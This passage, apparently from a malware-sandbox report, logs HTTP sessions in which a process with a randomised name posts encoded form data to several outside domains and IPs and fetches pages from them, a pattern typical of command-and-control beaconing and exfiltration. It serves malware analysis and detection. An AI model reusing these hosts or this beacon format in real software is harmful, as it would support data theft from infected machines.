QzmLxn8=QUIXBNmArpHqFM0T+FBi6NWhcGblP0pZ+MF0eJH2BsxrBrVLvkR7OR4kcAC2WOR3EqADdZBPMmUoWCrpIOvu6N47IQoUTQ0mhiGWEGP3ywbzq7q6N4N+UtnBYYBBcquttbGav7K3jwrzk3lSUUlXJEp3LCUKEzdIyZnWtrMUJ6aKNyUs2JxH6hWWOD+ezV0faPvStfwscEsNv/OwXl8wW8IoQPXRCmw2s2KfbXqyNa7B7sQEy+LZwifM445jlREnHMrOOfKNt5bMqmHOkmxBvvhEc0JKkJ8BOStw1hnKupZcp+8Xxc2un2MszSYUql6AOsKvDnh+WVHX33Qn4ztMH+nDj3e/uLSr3OPbW7nl1/yf0PW357ZHjouPVzKQTCsOfUozc2pQZF5plbYpfxxevtijbZUqcmljstASAA1MaktNJXhPvkcuOd+ekdLs1lrMnm9941xXahxj2aRPXnpu1vqSJ61lLdBvOZXSOkx0A5yxIqBgBBSO2qDvSoUcrKCLf1p/96VCAkLC/R0I+I177QPPLRHdgY5rt/bt5hfApaQSgKc8tGly53OtJgAl8zrDJ+Hm0YxcfqUh+xfFWC1fGebqAZmpT+lhoCHE+J/PlozmMWohejKecKT6O1Qla/JOSimauy6n1lWtHsJWSJnQC8FKKVLWWmdx/xVP3BcDPsWwdhh6Oy0pherXqO6U83U0N+D8vMkpOfE3agWnT5abxQo/S1tXh+s58NDrxR4V2tX2DyXLfmdsBKSLz0xnsJLLZsVXy2ZeLGwLP0J3k47zStkhetYe7JSIJqZT3KzGbSPBLbCcql0TmxRWXh54kuqpjW1AiTeSKqKxSqc/sDZc4lRgbxd4mkpjS35BZJLd2qqVyTQyIiSWxz38tP4Ym57sy+h78gPasxjvpxwdxas2u4Uq/75s0dxzd4XSDWxzrMst0ReH8r/Zub+u3pwy7W4PMLIZRw12SPrhzqbeUccofPTDLBOW6wcy4EWk5XiPi0ky [TRUNCATED]
Jan 10, 2025 19:57:20.214004993 CET	914	IN	HTTP/1.1 404 Not Found Date: Fri, 10 Jan 2025 18:57:20 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZCYoqOetX8C4bsXGwam7DuOgetrZ8HpdZ%2F2WlK%2FAd%2FYrYN37zmlQUXbqZuXfF0vW9lXwCcwfl2XyysljH5mIw9AfAN6pksO4enuuiDZu6VxrGXZsI7bJW%2FWjJ25Up%2BY6DX8%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ffee4616f2c4349-EWR Content-Encoding: gzip alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=1598&min_rtt=1598&rtt_var=799&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1739&delivery_rate=0&cwnd=225&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.8	49999	104.21.7.187	80	5868	C:\Program Files (x86)\uoDCMVLScsKYAuTKxxOMKKNyCZXVCgfVwdZauHKxAxUWLLVxlMRhbRDBYqOISGxZZTRwibfCJwccFsUp\uDeZXYtzetmc.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 19:57:21.728580952 CET	442	OUT	GET /9nv0/?QzmLxn8=dWg3C6isp4+VD88a1DBFx9aObA+xTghSwfxMZ+zxeeN7T5xq2T9IGxIaUDChQ5FgGLs4ea44SkIDXQDkT+XV66wbCmoESxYHmimpEhjR9x/TqaeLMadTIOG0BL9hL7PHyQ==&nbd8Y=hfD0 HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.9 Host: www.gk88top.top Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Jan 10, 2025 19:57:22.795964003 CET	932	IN	HTTP/1.1 404 Not Found Date: Fri, 10 Jan 2025 18:57:22 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kAg6ZCE8Tp%2FiefKpnrPzGuIUd%2Bom1uhY%2Ba4RxfLFCpcTjiu%2FJhkAUtySHgj%2B%2FVBYty7GeSB6l%2FMBmlKtVx3B9GQpdqOY9TF86d8W2qY3VCFS319X59D%2BQVcOwK92V2pjkSw%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ffee47158d543d0-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=1602&min_rtt=1602&rtt_var=801&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=442&delivery_rate=0&cwnd=179&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 39 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 92<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.8	50000	13.248.169.48	80	5868	C:\Program Files (x86)\uoDCMVLScsKYAuTKxxOMKKNyCZXVCgfVwdZauHKxAxUWLLVxlMRhbRDBYqOISGxZZTRwibfCJwccFsUp\uDeZXYtzetmc.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 19:57:27.845922947 CET	711	OUT	POST /lnu5/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Host: www.108.foundation Origin: http://www.108.foundation Content-Length: 208 Connection: close Cache-Control: max-age=0 Content-Type: application/x-www-form-urlencoded Referer: http://www.108.foundation/lnu5/ User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0 Data Raw: 51 7a 6d 4c 78 6e 38 3d 64 50 37 66 32 4f 52 73 4f 61 59 70 42 6c 50 63 62 42 5a 51 68 75 48 55 54 5a 4b 45 59 47 74 6d 4c 72 44 42 4f 6e 53 67 7a 44 6e 58 46 6a 34 73 33 59 30 69 34 6e 53 43 31 68 72 68 35 7a 6b 62 58 67 79 4d 37 51 31 66 67 39 4c 64 38 74 79 32 58 35 49 35 71 48 54 35 67 35 6a 44 6b 30 65 79 4a 2f 54 2f 6f 70 73 45 57 48 6c 68 56 4f 4b 67 6d 57 52 4b 38 69 56 70 41 48 47 30 6a 37 54 44 6d 7a 7a 2b 52 4d 41 6b 34 50 2f 34 51 6e 67 33 73 38 45 52 54 67 2f 78 4f 72 54 6f 76 70 6b 4e 45 63 6b 45 34 33 53 46 5a 77 57 6b 50 68 57 6e 46 4d 48 51 34 2b 55 4d 59 44 2f 74 58 54 64 56 52 45 73 78 6c 76 77 3d Data Ascii: QzmLxn8=dP7f2ORsOaYpBlPcbBZQhuHUTZKEYGtmLrDBOnSgzDnXFj4s3Y0i4nSC1hrh5zkbXgyM7Q1fg9Ld8ty2X5I5qHT5g5jDk0eyJ/T/opsEWHlhVOKgmWRK8iVpAHG0j7TDmzz+RMAk4P/4Qng3s8ERTg/xOrTovpkNEckE43SFZwWkPhWnFMHQ4+UMYD/tXTdVREsxlvw=
Jan 10, 2025 19:57:28.298774004 CET	73	IN	HTTP/1.1 405 Method Not Allowed content-length: 0 connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.8	50001	13.248.169.48	80	5868	C:\Program Files (x86)\uoDCMVLScsKYAuTKxxOMKKNyCZXVCgfVwdZauHKxAxUWLLVxlMRhbRDBYqOISGxZZTRwibfCJwccFsUp\uDeZXYtzetmc.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 19:57:30.390326023 CET	731	OUT	POST /lnu5/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Host: www.108.foundation Origin: http://www.108.foundation Content-Length: 228 Connection: close Cache-Control: max-age=0 Content-Type: application/x-www-form-urlencoded Referer: http://www.108.foundation/lnu5/ User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0 Data Raw: 51 7a 6d 4c 78 6e 38 3d 64 50 37 66 32 4f 52 73 4f 61 59 70 4f 68 7a 63 58 47 4e 51 77 2b 48 62 64 35 4b 45 42 32 74 69 4c 72 48 42 4f 6c 2b 4b 7a 33 4c 58 46 47 45 73 35 39 59 69 30 48 53 43 36 78 71 6c 33 54 6b 41 58 67 2f 7a 37 51 5a 66 67 39 66 64 38 74 43 32 55 4f 63 36 6c 33 54 37 35 4a 6a 37 36 45 65 79 4a 2f 54 2f 6f 70 49 2b 57 48 4e 68 56 63 65 67 6e 79 6c 4a 2f 69 56 71 4a 6e 47 30 79 4c 54 59 6d 7a 7a 35 52 4f 30 61 34 4d 48 34 51 69 45 33 73 74 45 53 5a 67 2f 33 4b 72 53 2b 73 37 56 48 4c 38 63 58 2f 30 53 53 62 68 2b 64 4f 58 6e 4e 66 75 50 57 37 2b 38 6e 59 41 58 62 53 6b 41 39 4c 6e 38 42 37 34 6b 79 63 45 2f 61 61 62 71 6b 31 32 6b 46 44 72 49 2b 51 2b 69 6a Data Ascii: QzmLxn8=dP7f2ORsOaYpOhzcXGNQw+Hbd5KEB2tiLrHBOl+Kz3LXFGEs59Yi0HSC6xql3TkAXg/z7QZfg9fd8tC2UOc6l3T75Jj76EeyJ/T/opI+WHNhVcegnylJ/iVqJnG0yLTYmzz5RO0a4MH4QiE3stESZg/3KrS+s7VHL8cX/0SSbh+dOXnNfuPW7+8nYAXbSkA9Ln8B74kycE/aabqk12kFDrI+Q+ij
Jan 10, 2025 19:57:30.841773033 CET	73	IN	HTTP/1.1 405 Method Not Allowed content-length: 0 connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.8	50002	13.248.169.48	80	5868	C:\Program Files (x86)\uoDCMVLScsKYAuTKxxOMKKNyCZXVCgfVwdZauHKxAxUWLLVxlMRhbRDBYqOISGxZZTRwibfCJwccFsUp\uDeZXYtzetmc.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 19:57:33.045672894 CET	1748	OUT	POST /lnu5/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Host: www.108.foundation Origin: http://www.108.foundation Content-Length: 1244 Connection: close Cache-Control: max-age=0 Content-Type: application/x-www-form-urlencoded Referer: http://www.108.foundation/lnu5/ User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0 Data Raw: 51 7a 6d 4c 78 6e 38 3d 64 50 37 66 32 4f 52 73 4f 61 59 70 4f 68 7a 63 58 47 4e 51 77 2b 48 62 64 35 4b 45 42 32 74 69 4c 72 48 42 4f 6c 2b 4b 7a 33 44 58 47 7a 49 73 32 2b 41 69 36 6e 53 43 35 78 71 6f 33 54 6b 4e 58 6b 53 36 37 51 45 6b 67 2f 6e 64 75 38 69 32 41 72 67 36 79 48 54 37 78 70 6a 41 6b 30 65 72 4a 2f 44 37 6f 70 59 2b 57 48 4e 68 56 64 75 67 6e 6d 52 4a 77 43 56 70 41 48 47 77 6a 37 53 57 6d 7a 62 50 52 4e 59 4b 34 38 6e 34 65 69 55 33 67 2f 38 53 62 41 2f 31 4e 72 53 32 73 37 5a 45 4c 38 78 6d 2f 33 4f 30 62 69 65 64 44 54 6e 53 4c 38 37 72 68 2f 30 54 62 43 6e 39 4b 44 77 51 4a 52 6f 57 34 2f 42 51 54 68 44 41 51 70 57 4a 36 51 55 50 42 75 31 6b 55 71 4c 4a 42 7a 61 32 4c 73 33 52 42 6b 39 69 4a 37 58 6e 34 70 53 4d 41 69 41 66 48 4f 67 32 51 2f 42 6c 48 79 38 78 38 76 7a 44 6b 2b 74 76 69 41 53 75 6a 31 59 77 53 68 2f 6d 61 66 56 4e 30 67 69 72 76 76 62 36 37 31 79 6e 53 77 6e 30 62 75 41 36 6b 6c 79 51 63 70 30 33 64 30 6e 73 4d 59 37 69 6a 59 2b 49 73 4b 6a 36 39 43 53 68 74 4d [TRUNCATED] Data Ascii: QzmLxn8=dP7f2ORsOaYpOhzcXGNQw+Hbd5KEB2tiLrHBOl+Kz3DXGzIs2+Ai6nSC5xqo3TkNXkS67QEkg/ndu8i2Arg6yHT7xpjAk0erJ/D7opY+WHNhVdugnmRJwCVpAHGwj7SWmzbPRNYK48n4eiU3g/8SbA/1NrS2s7ZEL8xm/3O0biedDTnSL87rh/0TbCn9KDwQJRoW4/BQThDAQpWJ6QUPBu1kUqLJBza2Ls3RBk9iJ7Xn4pSMAiAfHOg2Q/BlHy8x8vzDk+tviASuj1YwSh/mafVN0girvvb671ynSwn0buA6klyQcp03d0nsMY7ijY+IsKj69CShtMTp9f+5ew7R+VCGtMLrw9tvhP+wElv+YbONFcJIk3W5pnky3X4IIOtANPNWXOakIlvo1SiOlvI1hjxZrp0+I3bGfX3Z4A8loGHOzqibZtlRmbHW6hbwKTKIqRXCEXMf6ncFaCI1Z3kzJ3ZDE0O0AAcBwhFPUhizPDpNluyqVVlh6xPsC5DOI3BZpv5gyQGeD24XA40wW3SWQ0EHlwnr/TxLqKOTYz2SYtM7+Uxu+lHkzbCT4+3jBUNiJQUfx49nhj58QLn0wnVoKR0SSt/hjxnM5wxJl00/qKdq63strMbbguB6m2sxl2TAJnNpwVcuW5qlSr+Z160hB4gCVv4hfmeBIIJm1Rbu5n4zAthgxWuv8K1r6FgzMqzv+5fe2HOiSGXffF5xmJW8j/Nhi1dorKVGwa637uH+y2yNCBrhomfmwRPwU4B5+xM/b6Tyz98D+Ey1UIkPiL/CcSffHOcIr2JDpnKJo6A7VdUGMtzxTGK4RbrGG7X3NmRYsTIpo7eyAlO0t9jihatiiyZnqyqr6390wLGyvIMCwOi+9hI0CwxSgSbXHeFSeAe5nbvVq5wWPnjN64ltb2cct4SfXLHmtrlsfYvANHtPVGBFE5jlOfbU9u7snWNRI4758qzKWTZ5I7zzPG/KPoGYby30JWqpnF1bS55v3tUEk3Iq [TRUNCATED]
Jan 10, 2025 19:57:33.521481037 CET	73	IN	HTTP/1.1 405 Method Not Allowed content-length: 0 connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.8	50003	13.248.169.48	80	5868	C:\Program Files (x86)\uoDCMVLScsKYAuTKxxOMKKNyCZXVCgfVwdZauHKxAxUWLLVxlMRhbRDBYqOISGxZZTRwibfCJwccFsUp\uDeZXYtzetmc.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 19:57:35.591742992 CET	445	OUT	GET /lnu5/?nbd8Y=hfD0&QzmLxn8=QNT/15ZZU6AsGiWjSRYKkt/6S9anaGtoX8GfFyWC43f2cikt7PUu3WS46j+T51paYxuS3ixH2vbh2sKfAJw3ojfp25nO6F6qHofbl88ReUJsLvfvq1VL21AHNWbpiK3IyQ== HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.9 Host: www.108.foundation Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Jan 10, 2025 19:57:45.033318996 CET	387	IN	HTTP/1.1 200 OK content-type: text/html date: Fri, 10 Jan 2025 18:57:44 GMT content-length: 266 connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 6e 62 64 38 59 3d 68 66 44 30 26 51 7a 6d 4c 78 6e 38 3d 51 4e 54 2f 31 35 5a 5a 55 36 41 73 47 69 57 6a 53 52 59 4b 6b 74 2f 36 53 39 61 6e 61 47 74 6f 58 38 47 66 46 79 57 43 34 33 66 32 63 69 6b 74 37 50 55 75 33 57 53 34 36 6a 2b 54 35 31 70 61 59 78 75 53 33 69 78 48 32 76 62 68 32 73 4b 66 41 4a 77 33 6f 6a 66 70 32 35 6e 4f 36 46 36 71 48 6f 66 62 6c 38 38 52 65 55 4a 73 4c 76 66 76 71 31 56 4c 32 31 41 48 4e 57 62 70 69 4b 33 49 79 51 3d 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?nbd8Y=hfD0&QzmLxn8=QNT/15ZZU6AsGiWjSRYKkt/6S9anaGtoX8GfFyWC43f2cikt7PUu3WS46j+T51paYxuS3ixH2vbh2sKfAJw3ojfp25nO6F6qHofbl88ReUJsLvfvq1VL21AHNWbpiK3IyQ=="}</script></head></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.8	50004	162.0.213.94	80	5868	C:\Program Files (x86)\uoDCMVLScsKYAuTKxxOMKKNyCZXVCgfVwdZauHKxAxUWLLVxlMRhbRDBYqOISGxZZTRwibfCJwccFsUp\uDeZXYtzetmc.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 19:57:50.277206898 CET	699	OUT	POST /4woq/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Host: www.wintus.top Origin: http://www.wintus.top Content-Length: 208 Connection: close Cache-Control: max-age=0 Content-Type: application/x-www-form-urlencoded Referer: http://www.wintus.top/4woq/ User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0 Data Raw: 51 7a 6d 4c 78 6e 38 3d 55 78 74 6b 36 50 4d 67 30 65 75 66 46 6b 67 48 5a 57 37 51 42 48 34 43 61 30 68 45 78 5a 67 31 34 42 33 4b 4b 4f 43 6f 34 67 55 5a 52 39 49 62 50 4d 48 63 38 73 6f 72 41 42 71 30 70 74 70 79 37 50 6d 42 4b 57 45 6f 59 53 6c 7a 6f 55 79 2f 32 4f 35 42 4e 5a 75 34 4f 50 32 37 74 64 42 51 75 4c 41 61 5a 6f 32 45 43 53 34 50 36 64 45 6c 6b 39 78 59 56 6a 6e 64 38 74 2b 73 6d 61 78 42 64 51 46 37 6d 30 46 2b 4b 66 54 31 66 4b 4a 52 53 37 5a 30 50 30 51 34 71 51 4b 75 35 38 32 4b 46 2b 2f 6c 66 63 59 56 2b 57 4a 66 6f 63 34 53 4a 39 47 39 6f 44 69 74 67 4a 2f 6d 62 77 32 62 36 30 52 52 64 64 6f 3d Data Ascii: QzmLxn8=Uxtk6PMg0eufFkgHZW7QBH4Ca0hExZg14B3KKOCo4gUZR9IbPMHc8sorABq0ptpy7PmBKWEoYSlzoUy/2O5BNZu4OP27tdBQuLAaZo2ECS4P6dElk9xYVjnd8t+smaxBdQF7m0F+KfT1fKJRS7Z0P0Q4qQKu582KF+/lfcYV+WJfoc4SJ9G9oDitgJ/mbw2b60RRddo=
Jan 10, 2025 19:57:50.908188105 CET	1236	IN	HTTP/1.1 404 Not Found Date: Fri, 10 Jan 2025 18:57:50 GMT Server: Apache Content-Length: 16052 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
Jan 10, 2025 19:57:50.908283949 CET	1236	IN	Data Raw: 3e 0a 20 20 20 20 3c 2f 64 65 66 73 3e 0a 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 37 30 2e 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 69 64 3d 22 6c Data Ascii: > </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)" style="disp
Jan 10, 2025 19:57:50.908296108 CET	1236	IN	Data Raw: 38 2e 38 35 38 37 31 35 20 2d 30 2e 36 30 32 31 37 35 2c 2d 33 31 2e 34 36 39 32 32 38 20 2d 30 2e 30 31 32 35 33 2c 2d 32 32 2e 37 35 39 35 36 35 20 30 2e 37 31 37 32 36 32 2c 2d 34 31 2e 32 33 31 34 35 32 31 33 20 31 2e 36 32 38 39 39 35 2c 2d Data Ascii: 8.858715 -0.602175,-31.469228 -0.01253,-22.759565 0.717262,-41.23145213 1.628995,-41.23195399 z" style="display:inline;fill:#000000;stroke:none;stroke-width:0.23743393px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;"
Jan 10, 2025 19:57:50.908303022 CET	1236	IN	Data Raw: 30 2e 37 36 32 37 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 34 35 35 33 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 6f 70 61 63 69 74 79 3a 31 3b 66 Data Ascii: 0.76272" id="rect4553" style="display:inline;opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <pa
Jan 10, 2025 19:57:50.908313036 CET	1236	IN	Data Raw: 32 2c 31 35 2e 35 30 30 36 34 20 30 2e 39 31 36 37 39 38 2c 36 2e 38 33 34 33 34 20 32 2e 32 34 39 38 35 34 2c 31 36 2e 33 33 32 33 37 20 33 2e 34 39 39 39 30 32 2c 32 34 2e 39 31 36 30 34 20 31 2e 32 35 30 30 34 37 2c 38 2e 35 38 33 36 38 20 32 Data Ascii: 2,15.50064 0.916798,6.83434 2.249854,16.33237 3.499902,24.91604 1.250047,8.58368 2.416611,16.24967 4.583438,28.58394 2.166827,12.33427 5.333153,29.33244 8.499966,46.33323" style="display:inline;fill:none;stroke:#000000;stroke-widt
Jan 10, 2025 19:57:50.908318996 CET	1236	IN	Data Raw: 35 31 2c 31 2e 35 32 31 36 35 20 30 2e 32 32 32 39 39 2c 31 2e 30 36 35 37 39 20 30 2e 31 34 39 33 33 2c 30 2e 36 30 39 31 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c Data Ascii: 51,1.52165 0.22299,1.06579 0.14933,0.60912" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4533" d=
Jan 10, 2025 19:57:50.908324957 CET	1236	IN	Data Raw: 6b 65 2d 6c 69 6e 65 63 61 70 3a 62 75 74 74 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3a 6d 69 74 65 72 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 Data Ascii: ke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4541" d="m 85.206367,122.98266 c 0.117841,11.74369 0.235693,23.48835 0.235693,36.55072 -10e-7,13.06238 -0.117833,27.43796 -0.05891,45
Jan 10, 2025 19:57:50.908332109 CET	1236	IN	Data Raw: 2c 32 36 2e 37 30 30 33 33 20 2d 32 2e 32 39 38 33 39 34 2c 36 2e 39 35 33 36 32 20 2d 32 2e 32 39 38 33 39 34 2c 31 31 2e 35 34 39 32 32 20 2d 31 2e 33 35 35 34 31 39 2c 32 34 2e 35 37 34 31 35 20 30 2e 39 34 32 39 37 34 2c 31 33 2e 30 32 34 39 Data Ascii: ,26.70033 -2.298394,6.95362 -2.298394,11.54922 -1.355419,24.57415 0.942974,13.02493 2.828182,34.46917 5.066095,53.84746 2.237913,19.37829 4.833109,36.71892 7.425959,54.04387" style="display:inline;fill:none;stroke:#000000;stroke-w
Jan 10, 2025 19:57:50.908337116 CET	1236	IN	Data Raw: 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 35 32 39 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 31 33 32 2e 36 38 37 35 2c 32 36 33 2e 33 Data Ascii: 1;" /> <path id="path4529" d="m 132.6875,263.34998 c -4.2289,18.4155 -8.45806,36.83216 -12.6875,55.25" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-
